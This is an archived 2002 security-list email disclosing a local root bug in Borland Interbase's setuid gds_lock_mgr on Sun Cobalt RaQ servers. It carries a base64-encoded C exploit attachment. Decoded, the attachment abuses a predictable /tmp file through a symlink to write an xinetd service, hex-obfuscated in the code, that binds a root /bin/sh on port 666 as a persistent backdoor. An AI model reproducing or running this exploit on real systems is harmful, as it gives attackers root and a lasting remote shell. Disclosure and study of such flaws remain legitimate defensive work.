 | ||||||
| << Previous | INDEX | Search | src | Set bookmark | Go to bookmark | Next >> |
| ||||||
| |||||||||||||||||||||
Date: Wed, 25 Sep 2002 12:05:32 -0700 (PDT) From: grazer@digit-labs.org To: submissions@securiteam.com Subject: Borland Interbase local root exploit --1070528868-1989719880-1032980732=:11264 Content-Type: TEXT/PLAIN; charset=US-ASCII Hello, I've found a bug in the Interbase gds_lock_mgr binary which is shipped with all versions of the Sun Cobalt RAQ (XTR/4/550 etc.) and is suid by default. Borland did not respond to my emails. The exploit is attached. Note: other bug than disclosed by snosoft some weeks ago. Sincerely yours, Wouter ter Maat aka grazer --1070528868-1989719880-1032980732=:11264 Content-Type: TEXT/x-csrc; name="interbase-gds-exploit.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.33.0209251205320.11264@bespin.org> Content-Description: Content-Disposition: attachment; filename="interbase-gds-exploit.c" Ly8gZ2RzX2xvY2tfbWdyIGVhc3kgbG9jYWwgcm9vdCBjb21wcm9taXNlDQov LyBBbGwgY29iYWx0IExpbnV4IGFmZmVjdGVkLCBhbmQgY2VydGFpbiBtYW5k cmFrZSBpbnN0YWxsYXRpb25zLg0KLy8gV291dGVyIHRlciBNYWF0IGFrYSBn cmF6ZXIgLSBodHRwOi8vd3d3Lmktc2VjdXJpdHkubmwNCg0KI2luY2x1ZGUg PHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lz L3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3N0YXQuaD4NCiNpbmNsdWRlIDxz eXMvdXRzbmFtZS5oPg0KDQojZGVmaW5lIEJEUEFUSCAiL2V0Yy94aW5ldGQu ZC94aW5ldGRiZCINCiNkZWZpbmUgR0RTQklOICIvb3B0L2ludGVyYmFzZS9i aW4vZ2RzX2xvY2tfbWdyIg0KDQppbnQgbWFpbigpIHsNCg0Kc3RydWN0IHV0 c25hbWUgYnVmOw0KY2hhciBwYXRoWzI0XSwgbG5jWzM0XTsNCiANCkZJTEUg KmZkOw0KDQovKiBjaGVjayBmb3IgYSByb290c2hlbGwgb24gcG9ydCA2NjYg YWZ0ZXIgdGhlIG1hY2hpbmUgaGFzIHJlYm9vdGVkLg0KICogZXhwbG9pdCB3 cml0dGVuIHRvIHdvcmsgb24gYSByYXE1NTAgdXNpbmcgeGluZXRkDQogKi8N Cg0KY2hhciAqaGV4YmQgPSAiXHg3M1x4NjVceDcyXHg3Nlx4NjlceDYzXHg2 NVx4MjBceDc4XHg2OVx4NmVceDY1XHg3NFx4NjQiDQogICAgICAgICAgICAg ICJceDYyXHg2NFxuXHg3YlxuXHg2NFx4NjlceDczXHg2MVx4NjJceDZjXHg2 NVx4MjBceDNkXHgyMCINCiAgICAgICAgICAgICAgIlx4NmVceDZmXG5ceDcw XHg3Mlx4NmZceDc0XHg2Zlx4NjNceDZmXHg2Y1x4MjBceDNkXHgyMFx4MzYi DQogICAgICAgICAgICAgICJceDM2XHgzNlxuXHg3M1x4NmZceDYzXHg2Ylx4 NjVceDc0XHg1Zlx4NzRceDc5XHg3MFx4NjVceDIwIg0KICAgICAgICAgICAg ICAiXHgzZFx4MjBceDczXHg3NFx4NzJceDY1XHg2MVx4NmRcblx4NzdceDYx XHg2OVx4NzRceDIwXHgzZCINCiAgICAgICAgICAgICAgIlx4MjBceDZlXHg2 ZlxuXHg3NVx4NzNceDY1XHg3Mlx4MjBceDNkXHgyMFx4NzJceDZmXHg2Zlx4 NzQiDQogICAgICAgICAgICAgICJcblx4NzNceDY1XHg3Mlx4NzZceDY1XHg3 Mlx4MjBceDNkXHgyMFx4MmZceDYyXHg2OVx4NmVceDJmIg0KICAgICAgICAg ICAgICAiXHg3M1x4Njhcblx4NzNceDY1XHg3Mlx4NzZceDY1XHg3Mlx4NWZc eDYxXHg3Mlx4NjdceDczXHgyMCINCiAgICAgICAgICAgICAgIlx4M2RceDIw XHgyZFx4Njlcblx4N2RcbiI7DQoNCmZwcmludGYoc3Rkb3V0LCAiKioqIGdk c19sb2NrX21nciBsb2NhbCByb290IGV4cGxvaXQgLSBncmF6ZXIgKioqXG4i KTsNCg0KdW5hbWUoJmJ1Zik7DQpzZXRlbnYoIklOVEVSQkFTRSIsICIvdG1w IiwgMSk7IA0Kc3ByaW50ZihwYXRoLCAiJXMiLCAiL3RtcC9pc2NfaW5pdDEu Iik7DQpzdHJjYXQocGF0aCwgYnVmLm5vZGVuYW1lKTsNCg0KY2hkaXIoIi90 bXAiKTsNCnVtYXNrKDAwMCk7DQoNCnNwcmludGYobG5jLCAibG4gJXMgLXMg JXMiLCBCRFBBVEgsIHBhdGgpOw0Kc3lzdGVtKGxuYyk7DQoNCmlmKGZkPWZv cGVuKEdEU0JJTiwgInIiKSkgew0Kc3lzdGVtKEdEU0JJTik7IGNsb3NlKGZk KTsgfQ0KZWxzZSB7DQpmcHJpbnRmKHN0ZGVyciwgIiVzIG5vdCBmb3VuZC4u LlxuIiwgR0RTQklOKTsgDQpleGl0KDApOyB9DQoNCmlmKGZkPWZvcGVuKEJE UEFUSCwgInciKSkgeyANCmZwcmludGYoc3RkZXJyLCIgICAgIGV4cGxvaXQg c3VjY2VzZnVsbC4uLlxuIik7DQpmcHJpbnRmKGZkLCAiJXMiLCBoZXhiZCk7 IGNsb3NlKGZkKTt9DQplbHNlIHsNCmZwcmludGYoc3RkZXJyLCAiZXhwbG9p dCBmYWlsZWQuLi5cbiIpOyANCmV4aXQoMCk7IH0NCg0KfQ0KDQo= --1070528868-1989719880-1032980732=:11264--
| |||||||||||||||||||||